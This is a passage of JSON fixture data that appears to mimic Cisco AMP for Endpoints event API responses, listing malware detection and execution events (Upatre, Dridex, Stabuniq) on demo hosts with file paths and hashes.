Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263621","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":1664,"disposition":"Malicious","file_name":"Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":673000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263620","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":658000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263619","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":627000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263618","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207844921180000,"timestamp":1610704822,"timestamp_nanoseconds":699000000,"date":"2021-01-15T10:00:22+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207844921180170","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659264906658000,"timestamp":1610704820,"timestamp_nanoseconds":460000000,"date":"2021-01-15T10:00:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659264906657801","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1490719361224000800,"timestamp":1610704819,"timestamp_nanoseconds":224000000,"date":"2021-01-15T10:00:19+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"Win.Trojan.Upatre.tht.VRT","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704819,"start_date":"2021-01-15T10:00:19+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331413502427000,"timestamp":1610704818,"timestamp_nanoseconds":57000000,"date":"2021-01-15T10:00:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331409207459841","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825614973673406000,"timestamp":1610704817,"timestamp_nanoseconds":734000000,"date":"2021-01-15T10:00:17+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1185,"scanned_processes":22,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207810561442000,"timestamp":1610704814,"timestamp_nanoseconds":961000000,"date":"2021-01-15T10:00:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207810561441801","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207806266474000,"timestamp":1610704813,"timestamp_nanoseconds":963000000,"date":"2021-01-15T10:00:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207806266474504","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207801971507000,"timestamp":1610704812,"timestamp_nanoseconds":902000000,"date":"2021-01-15T10:00:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207801971507206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.cab","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\4543543.cab","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"},"parent":{"process_id":2348,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207801971507000,"timestamp":1610704812,"timestamp_nanoseconds":777000000,"date":"2021-01-15T10:00:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207801971507207","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"},"parent":{"process_id":2348,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":179000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984840","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":2692,"disposition":"Malicious","file_name":"jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":148000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984839","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":117000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984838","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":1960,"disposition":"Clean","file_name":"IEXPLORE.EXE","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":39000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984837","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":1960,"disposition":"Clean","file_name":"IEXPLORE.EXE","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":7000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659217662017540","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659217662018000,"timestamp":1610704809,"timestamp_nanoseconds":867000000,"date":"2021-01-15T10:00:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659217662017539","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899966001000,"timestamp":1610704801,"timestamp_nanoseconds":966000000,"date":"2021-01-15T10:00:01+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.GenericKD:N.18fd.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704801,"start_date":"2021-01-15T10:00:01+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a"},"parent":{"disposition":"Clean","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395844000300,"timestamp":1610704800,"timestamp_nanoseconds":844000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Executed 